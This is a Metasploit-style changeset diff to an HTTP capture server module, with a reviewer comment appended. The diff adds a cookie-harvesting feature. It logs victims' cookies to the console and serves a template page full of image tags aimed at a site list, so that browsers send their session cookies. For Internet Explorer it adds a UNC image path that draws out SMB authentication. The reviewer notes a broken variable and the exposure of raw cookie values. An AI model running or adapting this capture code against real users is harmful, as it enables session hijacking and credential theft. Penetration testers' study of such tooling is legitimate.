Changeset 5484
- Timestamp:
- 04/21/08 16:04:11 (3 weeks ago)
- Files:
-
- framework3/trunk/data/exploits/capture (added)
- framework3/trunk/data/exploits/capture/http (added)
- framework3/trunk/data/exploits/capture/http/index.html (added)
- framework3/trunk/data/exploits/capture/http/sites.txt (added)
- framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (5 diffs)
framework3/trunk/modules/auxiliary/server/capture/http.rb
r5483 r5484 45 45 [ 46 46 OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]), 47 OptPath.new('BGIMAGE', [ false, "The background image to use for the default web page", nil ]) 47 OptPath.new('TEMPLATE', [ false, "The HTML template to serve in responses", 48 File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "index.html") 49 ] 50 ), 51 OptPath.new('SITELIST', [ false, "The list of URLs that should be used for cookie capture", 52 File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt") 53 ] 54 ) 48 55 ], self.class) 49 56 end … … 55 62 56 63 def run 57 @bgimage = datastore['BGIMAGE'] 58 @myhost = datastore['SRVHOST'] 59 @myport = datastore['SRVPORT'] 64 @template = datastore['TEMPLATE'] 65 @sitelist = datastore['SITELIST'] 66 @myhost = datastore['SRVHOST'] 67 @myport = datastore['SRVPORT'] 60 68 exploit() 61 69 end … … 141 149 mysrc = Rex::Socket.source_address(cli.peerhost) 142 150 hhead = (req['Host'] || @myhost).split(':', 2)[0] 151 152 153 cookies = req['Cookies'] || '' 154 143 155 144 156 if(req['Authorization'] and req['Authorization'] =~ /basic/i) … … 185 197 end 186 198 187 print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} ")199 print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} cookies=#{cookies}") 188 200 189 201 … … 205 217 # GET /bag.xml 206 218 end 207 208 209 # Background image 210 body_extra = "" 211 if(@bgimage) 212 img_ext = @bgimage.split(".")[-1].downcase 213 req_ext = req.resource.split(".")[-1] 214 ctypes = 215 { 216 "jpg" => "image/jpeg", 217 "jpeg" => "image/jpeg", 218 "png" => "image/png", 219 "gif" => "image/gif", 220 } 221 222 begin 223 if (img_ext == req_ext.downcase) 224 225 ctype = ctypes[img_ext] || ctypes["jpg"] 226 idata = "" 227 isize = File.size(@bgimage) 228 229 fd = File.open(@bgimage) 230 idata = 
fd.sysread(isize) 231 fd.close 232 233 res = 234 "HTTP/1.1 200 OK\r\n" + 235 "Host: #{mysrc}\r\n" + 236 "Content-Type: #{ctype}\r\n" + 237 "Content-Length: #{idata.length}\r\n" + 238 "Connection: Close\r\n\r\n#{idata}" 239 240 cli.put(res) 241 return 242 end 243 rescue ::Exception 244 end 245 246 body_extra = "<img src='/background.#{img_ext}' width='100%' height='100%'>" 247 end 248 249 250 data = "<html><head><title>Connecting...</title></head><body>#{body_extra}" 219 220 221 # Handle image requests 222 ctypes = 223 { 224 "jpg" => "image/jpeg", 225 "jpeg" => "image/jpeg", 226 "png" => "image/png", 227 "gif" => "image/gif", 228 } 229 230 req_ext = req.resource.split(".")[-1].downcase 231 232 if(ctypes[req_ext]) 233 ctype = ctypes[img_ext] || ctypes["jpg"] 234 res = 235 "HTTP/1.1 200 OK\r\n" + 236 "Host: #{mysrc}\r\n" + 237 "Content-Type: #{ctype}\r\n" + 238 "Content-Length: 0\r\n" + 239 "Connection: Close\r\n\r\n" 240 241 cli.put(res) 242 return 243 end 244 245 246 buff = '' 247 251 248 if(ua_name == "IE") 252 data << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 253 end 254 255 data << "</body></html>" 256 249 buff << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 250 end 251 252 list = File.readlines(@sitelist) 253 list.each do |site| 254 next if site =~ /^#/ 255 site.strip! 256 next if site.length == 0 257 buff << "<img src='http://#{site}/pixel.gif'>" 258 end 259 260 data = File.read(@template) 261 data.gsub!(/%CONTENT%/, buff) 262 257 263 res = 258 264 "HTTP/1.1 200 OK\r\n" +
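Review bot: The new image handler still reads `img_ext` in `ctype = ctypes[img_ext] || ctypes["jpg"]`, but the block that assigned it from `@bgimage` was removed, so unless it is set outside the visible hunks every request for a .jpg/.jpeg/.png/.gif resource raises NameError instead of returning the empty image response; the line should read `ctype = ctypes[req_ext]`. In the same hunk `File.readlines(@sitelist)` and `File.read(@template)` run on every request with no rescue, and both options are registered with `false` in the required slot, so a missing or unreadable file fails the handler per request; reading and checking both once in `run` would surface the problem at start-up. The changed `print_status` line now writes raw cookie values to the console, which deserves a comment such as `# cookie values are session secrets; treat console output and saved logs as sensitive`. The request handler these hunks belong to starts and ends outside the shown lines.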
